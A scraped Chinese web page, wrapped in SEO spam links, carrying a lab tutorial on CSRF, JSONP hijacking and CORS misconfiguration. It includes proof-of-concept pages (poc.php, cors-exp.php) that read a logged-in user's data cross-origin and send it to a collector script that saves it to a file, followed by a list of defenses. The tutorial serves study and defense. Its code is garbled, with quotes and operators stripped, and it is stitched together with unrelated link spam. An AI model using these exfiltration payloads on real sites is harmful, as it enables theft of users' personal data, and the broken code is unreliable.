当前位置: 首页 > news >正文

网站建设 安庆seo网站搭建

网站建设 安庆,seo网站搭建,企业网站需要哪些模块,谷歌服务器一、CSRF 漏洞#xff1a; 1、漏洞概述#xff1a; #xff08;1#xff09;一般情景#xff1a; 利用已认证用户的身份执行未经用户授权的操作。攻击者试图欺骗用户在其不知情的情况下执行某些操作#xff0c;通常是在受害者已经登录到特定网站的情况下。 #xff0…一、CSRF 漏洞 1、漏洞概述 1一般情景 利用已认证用户的身份执行未经用户授权的操作。攻击者试图欺骗用户在其不知情的情况下执行某些操作通常是在受害者已经登录到特定网站的情况下。 2JSONP 漏洞 JSONP 是用于跨域读取数据的技术为了绕过同源策略可以使用 script src... img src... link href... iframe src... 等标签来进行跨域 3CORS 漏洞 1、CORS的引入: 由于同源策略的限制许多Web应用程序需要与不同域的资源进行交互 因此CORS被引入以允许这种跨域请求。 CORS是一种通过HTTP头部来控制的机制它告诉浏览器是否允许一个特定的跨域请求。2、CORS头部: 要使用CORS服务器需要在HTTP响应头部中包括一些特定的字段例如 1Access-Control-Allow-Origin: 指定允许访问资源的域可以是特定域名或 *表示允许任何域。 2Access-Control-Allow-Methods: 指定允许的HTTP方法如 GET、POST、PUT 等。 3Access-Control-Allow-Headers: 指定允许的HTTP头部用于在实际请求中包含自定义头部信息。 4Access-Control-Expose-Headers: 指定哪些响应头部可以被暴露给浏览器。 CORS 请求时时getResponseHeader()方法只能拿到 6 个基本字段Cache-Control、Content-Language、Content-Type、Expires、Last-Modified、Pragma。如果想拿到其他字段就必须在 Access-Control-Expose-Headers 里面指定。5Access-Control-Allow-Credentials: 指定是否允许发送身份验证凭证例如cookies。 6Access-Control-Max-Age: 指定预检请求的有效时间在发送实际请求之前进行的检查。3、简单请求和预检请求: 浏览器执行CORS请求时将根据请求的类型分为“简单请求”和“预检请求”。 1简单请求GET、HEAD 和 POST 方法且只包含了浏览器自动添加的标准头部例如 Content-Type。 2预检请求对于复杂请求浏览器会首先发送一个预检请求OPTIONS请求以检查服务器是否允许实际请求。4、安全性: CORS 的实施有助于确保跨域请求不会引发安全问题。服务器可以配置哪些域名允许访问资源可以控制允许的HTTP方法和头部以及是否允许发送身份验证凭证。这有助于防止恶意网站访问敏感资源。 在前端代码中使用XMLHttpRequest或Fetch API可以进行CORS请求。浏览器会自动处理CORS头部和响应。 2、漏洞情景 1一般情景 用户访问网站 A验证成功网站 A 回传给用户 cookie 参数在用户未退出网站 A 的情况下访问了网站 B网站 B 发送了一个访问网站 A 的请求用户点击后恶意代码执行攻击达成。 2JSPON 漏洞 网站 A 存在一个 jsonp 接口用户在网站 A 上登陆后这个 jsonp 接口会返回用户的个人信息并在网站 A 的页面上进行显示。如果网站 A 对此 jsonp 接口的来源验证存在漏洞那么当用户访问网站 B 时网站 B 便可以利用此漏洞获取用户信息。 3CORS 漏洞 其实都差不多一个意思 二、实例 实例1pikachu 靶场的 CSRF 1登陆成功后 2点击提交用 burpsuite 抓取修改页面的信息 3使用 Generator CSRF PoC 工具 4在退出登陆前访问生成的页面再点击后攻击达成 注意 1如果是 get 型的请求其实是不用点击的直接用短链接生成 url 就行了 2如果有 xss 漏洞可以自动访问这个 html 页面 实例2JSONP 漏洞 1、实例源码 1user.php ?php header(Content-type: application/json);$callback $_GET[callback];print $callback.({id:1,name:1,email:1});; ? 2get_json.html !DOCTYPE html htmlheadmeta charsetutf-8title/titlescript srchttp://apps.bdimg.com/libs/jquery/1.10.2/jquery.min.js/script/headbodyscriptfunction jsonp2(data){alert(JSON.stringify(data));}/scriptscript srchttp://localhost/jsonp/user.php?callbackjsonp2/script/body /html 3poc.php !DOCTYPE html html headmeta charsetUTF-8title/titlescript srchttp://apps.bdimg.com/libs/jquery/1.10.2/jquery.min.js/scriptscriptfunction test(data) {var xmlhttp new XMLHttpRequest();var url http://localhost/jsonp/poc.php?file JSON.stringify(data);xmlhttp.open(GET, url, true);xmlhttp.send();}/scriptscript srchttp://localhost/jsonp/user.php?callbacktest/script /head body /body /html?phpif ($_GET[file]) {file_put_contents(json.txt, $_GET[file]);} ? 2、漏洞复现 1访问 user.php 可以看到设定好的数据 2访问 get_json.html 可以弹窗获取设定好的数据 3访问 poc.php 可以把获取到的 json 数据保存在本地 json.txt 中 实例3CORS 漏洞 1、实例源码 1userinfo.php ?phpif ($_SERVER[HTTP_ORIGIN]){header(Access-Control-Allow-Origin: .$_SERVER[HTTP_ORIGIN]);}else{header(Access-Control-Allow-Origin: *);}header(Access-Control-Allow-Headers: X-Requested-With);header(Access-Control-Allow-Credentials: true);header(Access-Control-Allow-Methods: PUT,POST,GET,DELETE,OPTIONS);$info array(username Vulkey_Chen, mobilephone 13188888888, email admingh0st.cn, address 中华人民共和国, sex Cool Man);echo json_encode($info); ? 2test.html !DOCTYPE html html langen headmeta charsetUTF-8titleCors/title /head body scriptfunction cors() {var xhr new XMLHttpRequest();xhr.onreadystatechange function () {if(xhr.readyState 4){alert(xhr.responseText);}}xhr.open(GET,http://localhost:860/csrf/userinfo.php);xhr.send();}cors(); /script /body /html 3cors-exp.php /head body scriptfunction cors() {var xhr new XMLHttpRequest();var xhr1 new XMLHttpRequest();xhr.onreadystatechange function () {if(xhr.readyState 4){alert(xhr.responseText)var data xhr.responseText;xhr1.open(POST,http://localhost/cors/cors-exp.php,true);xhr1.setRequestHeader(Content-type,application/x-www-form-urlencoded);alert(data);xhr1.send(moonescape(cc));}}xhr.open(GET,http://localhost:860/csrf/userinfo.php);xhr.send();}cors(); /script /body /html?php$data $_POST[cc];if($data){$myfile fopen(data1.txt,w);fwrite($myfile,$data);fclose($myfile);} ? 2、漏洞复现 1先访问 userinfo.php 2访问 test.html 测试 3访问 cors-exp.php 来进行文件写入 三、漏洞预防 1、增加 Token 验证对关键操作增加 Token 参数token 必须随机每次都不一样 2、关于安全的会话管理避免会话被利用 不要在客户端保存敏感信息比如身份验证信息 退出、关闭浏览器时的会话过期机制 设置会话过机制比如 15 分钟无操作则自动登录超时 3、访问控制安全管理 敏感信息的修改时需要身份进行二次认证比如修改账号密码需要判断旧 密码 4、敏感信息的修改使用 POST而不是 GET 通过 HTTP 头部中的 REFERER 来限制原页面 5、JSONP 存在安全风险因此如果不是必需尽量避免使用它。而是使用更安全的替代方法如CORS 6、CORS 是一种更安全的方法允许服务器控制哪些域可以访问其资源。使用CORS需要在服务器端进行配置以明确指定允许的域 7、如果必须使用 JSONP确保对从客户端接收的数据进行严格的输入验证和过滤。不要信任客户端提供的数据因为它可能包含恶意代码 8、设置回调函数随机 9、CORS 不要配置 Access-Control-Allow-Origin  为通配符“*” 10、要严格效验来自请求数据包中的Origin 的值。当收到跨域请求的时候要检查Origin 的值是否是一个可信的源 还要检查是否为 null 11、避免使用 Access-Control-Allow-Credentials: true 12、减少 Access-Control- Allow-Methods 所允许的方法
http://www.zqtcl.cn/news/650306/

相关文章:

  • 自动化优化系统网站建设网站建设类文章
  • 网站建设以及推广提案书支付通道网站怎么做
  • 上海兼职做网站凤凰军事新闻
  • 青田建设局网站ui培训哪好
  • 佛山网站seo哪家好全返网站建设
  • 快速建站哪个平台好常见网页设计
  • 织梦网站地图模板网站服务费
  • 织梦建设两个网站 视频互联网公司排名1000
  • 广州企业网站设计西昌手机网
  • 一个工厂做网站有用吗wordpress重写登录页面
  • 网站服务器如何搭建网站分页设计
  • 可以直接进入网站的正能量连接温州注册网络公司
  • 清丰网站建设价格福州绿光网站建设工作室
  • 武城网站建设价格东莞容桂网站制作
  • 工作室网站需要备案吗wordpress群发工具
  • 官方网站娱乐游戏城自己做网站的好处
  • 查询建设规范的网站1元网站建设精品网站制作
  • 社交网站的优点和缺点个人网页制作软件
  • 做一家算命的网站有没有专门做淘宝客的网站
  • 网站站点管理在哪里建筑施工图设计
  • 众筹网站开发周期网页云原神
  • 哪些网站可以免费做h5东莞制作企业网站
  • 帝国cms 网站地址设置深圳住房和建设部网站
  • 专业网站建设价格最优网页游戏大全电脑版在线玩
  • 建设租车网站wordpress+js插件开发
  • 定制网站开发与模板商务酒店设计网站建设
  • php 网站部署后乱码wordpress禁止调用头部
  • 网站权重低营销型企业网站建站
  • 大港油田建设网站长春市网站优化公司
  • 嘉峪关市建设局建管科资质网站室内设计入门教程